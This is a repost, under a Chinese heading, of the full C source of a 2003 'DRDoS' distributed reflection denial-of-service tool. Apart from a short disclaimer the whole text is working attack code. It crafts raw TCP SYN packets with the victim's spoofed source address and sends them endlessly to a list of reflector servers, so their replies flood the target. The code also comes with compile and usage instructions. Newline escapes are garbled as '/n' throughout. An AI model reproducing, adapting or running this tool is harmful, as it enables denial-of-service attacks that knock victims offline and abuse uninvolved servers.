一个DDOS工具源码

/**************************************************************************/
/* DRDoS - Distributed Reflection Denial of Service tool           */
/*                                                 */
/* Copyright (C) 2003 KrystalEye.com                         */
/*                                                 */
/* This program is free software; you can redistribute it and/or modify */
/* it under the terms of the GNU General Public License as published by */
/* the Free Software Foundation; either version 2 of the License, or   */
/* (at your option) any later version.                       */
/*                                                 */
/* This program is distributed in the hope that it will be useful,     */
/* but WITHOUT ANY WARRANTY; without even the implied warranty of     */
/* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the       */
/* GNU General Public License for more details.                 */
/*                                                 */
/**************************************************************************/
/* Version - 1.0                                       */
/*                                                 */
/* Purpose - Demonstration of DRDoS attacks                     */
/*                                                 */
/* Author - Nguyen Minh Nhat <ngmnhat@yahoo.com>                 */
/*       http://www.krystaleye.com/                       */
/*                                                 */
/* Disclaimer - You must be ROOT to use RAW socket.               */
/*           This program is for educational purposes only and     */
/*           network testing ON YOUR OWN NETWORK! Do not use it     */
/*           for malicious purposes!                       */
/*           I am in NO way responsible for what you do with this   */
/*           program, or any damage you or this program causes.     */
/*                                                 */
/* For whom - People with a little knowledge of TCP/IP, C source code   */
/*         and general UNIX. Otherwise, please keep your hands off,   */
/*         and catch up on those things first.                 */
/*                                                 */
/* Compiling - gcc -o DRDoS DRDoS.c                         */
/*                                                 */
/* Usage - Usage is described in the welcome screen of this program when */
/*       running it without arguments                       */
/**************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>

#define IPHDRSIZE sizeof(struct iphdr)
#define TCPHDRSIZE sizeof(struct tcphdr)
#define PSEUDOHDRSIZE sizeof(struct pseudohdr)

struct pseudohdr
{
unsigned long saddr;
unsigned long daddr;
char useless;
unsigned char protocol;
unsigned short length;
};
struct forcksum
{
struct pseudohdr pseudo;
struct tcphdr tcp;
};

unsigned short in_cksum(unsigned short * addr,int len);
int main(int argc,char * argv[]);

int main(int argc,char * argv[])
{
int val;

char fname[1000];
FILE * list;

char * packet;
struct iphdr * ip;
struct tcphdr * tcp;
struct forcksum helpcksum;

int serverfd;
struct sockaddr_in server;

char saddr[100],daddr[100];
unsigned short a,b,c,d,sport,dport,tport;

if (argc != 3)
{
  printf("/nDistributed Reflection DoS tool - v1.0/n");
  printf("Copyright (C) 2003 KrystalEye.com/n/n");
  printf("Usage: %s <list> <target IP>/n/n",argv[0]);
  printf("   -list   : Path to Zombies (/"Reflection Servers/") list file/n");
  printf("   -target IP: IP address of target/n/n");
  printf("*** Syntax of list file ***/n");
  printf("   -Each line contains 1 zombie's information/n");
  printf("   -Each zombie is described by 5 numbers:/n");
  printf("     4 octets of IP address (without '.') and Port number/n");
  printf("   -Numbers are seperated by at least 1 blank character (' ')/n");
  printf("Example: 203 162 56 78 80/n");
  printf("     => IP: 203.162.56.78 || Port: 80/n/n");
  printf("Email: ngmnhat@yahoo.com/n");
  printf("Good luck! Thanks for using this tool!/n/n");
  exit(-1);
}
else
{
  sprintf(fname,"%s",argv[1]);
  sprintf(saddr,"%s",argv[2]);
  sprintf(daddr,"%s",argv[2]);
  tport = random() % 10000;
  sport = tport;
  dport = tport;
}

if ((packet = (char *)malloc(IPHDRSIZE + TCPHDRSIZE)) == NULL)
{
  printf("Error: malloc()/n");
  exit(-1);
}

bzero(packet,sizeof(packet));
bzero(&helpcksum,sizeof(helpcksum));

ip = (struct iphdr *)packet;
tcp = (struct tcphdr *)(packet + IPHDRSIZE);

helpcksum.pseudo.saddr = inet_addr(saddr);
helpcksum.pseudo.daddr = inet_addr(daddr);
helpcksum.pseudo.useless = 0;
helpcksum.pseudo.protocol = IPPROTO_TCP;
helpcksum.pseudo.length = htons(TCPHDRSIZE);

tcp->source = htons(sport);
tcp->dest = htons(dport);
tcp->seq = htonl(random());
tcp->ack_seq = 0;
tcp->doff = 5;
tcp->fin = 0;
tcp->syn = 1;
tcp->rst = 0;
tcp->psh = 0;
tcp->ack = 0;
tcp->window = htons(65535);
tcp->urg_ptr = 0;
tcp->check = 0;
helpcksum.tcp = *tcp;
tcp->check = in_cksum((unsigned short *)&helpcksum,TCPHDRSIZE + PSEUDOHDRSIZE);

ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->tot_len = IPHDRSIZE + TCPHDRSIZE;
ip->id = random();
ip->ttl = 255;
ip->protocol = IPPROTO_TCP;
ip->saddr = inet_addr(saddr);
ip->daddr = inet_addr(daddr);
ip->check = 0;
ip->check = in_cksum((unsigned short *)ip,IPHDRSIZE);

if ((serverfd = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
{
  printf("Error: socket()/n");
  exit(-1);
}

setsockopt(serverfd,IPPROTO_IP,IP_HDRINCL,&val,sizeof(int));

bzero(&server,sizeof(struct sockaddr));
server.sin_family = AF_INET;

if ((list = fopen(fname,"r")) == NULL)
{
  printf("Error: cannot open file/n");
  exit(-1);
}
fscanf(list,"%hu",&a);
if (feof(list))
{
  printf("Error: empty list/n");
  fclose(list);
  exit(-1);
}
fclose(list);

printf("/nAttacking %s.../n/n",argv[2]);
printf("Press <Ctrl-C> to Stop./n");

while (1)
{
  list = fopen(fname,"r");

  while (!feof(list))
  {
    fscanf(list," %hu %hu %hu %hu %hu",&a,&b,&c,&d,&tport);

    sprintf(daddr,"%hu.%hu.%hu.%hu",a,b,c,d);
  
    helpcksum.pseudo.daddr = inet_addr(daddr);

    ip->daddr = inet_addr(daddr);
    ip->id = random();
    ip->check = 0;

    dport = tport;

    tcp->source = htons(random() % 10000);
    tcp->dest = htons(dport);
    tcp->seq = htonl(random());
    tcp->check = 0;
    helpcksum.tcp = *tcp;

    tcp->check = in_cksum((unsigned short *)&helpcksum,TCPHDRSIZE + PSEUDOHDRSIZE);
    ip->check = in_cksum((unsigned short *)ip,IPHDRSIZE);

    server.sin_addr.s_addr = inet_addr(daddr);
    server.sin_port = htons(dport);
  
    sendto(serverfd,packet,ip->tot_len,0,(struct sockaddr *)&server,sizeof(struct sockaddr));

    usleep(100);
  }

  fclose(list);
}

close(serverfd);
return 0;
}

unsigned short in_cksum(unsigned short * addr,int len)
{
register int sum = 0;
u_short answer = 0;
register u_short * w = addr;
register int nleft = len;
while (nleft > 1)
{
  sum += *w++;
  nleft -= 2;
}
if (nleft == 1)
{
  *(u_char *)(&answer) = *(u_char *)w;
  sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return answer;
}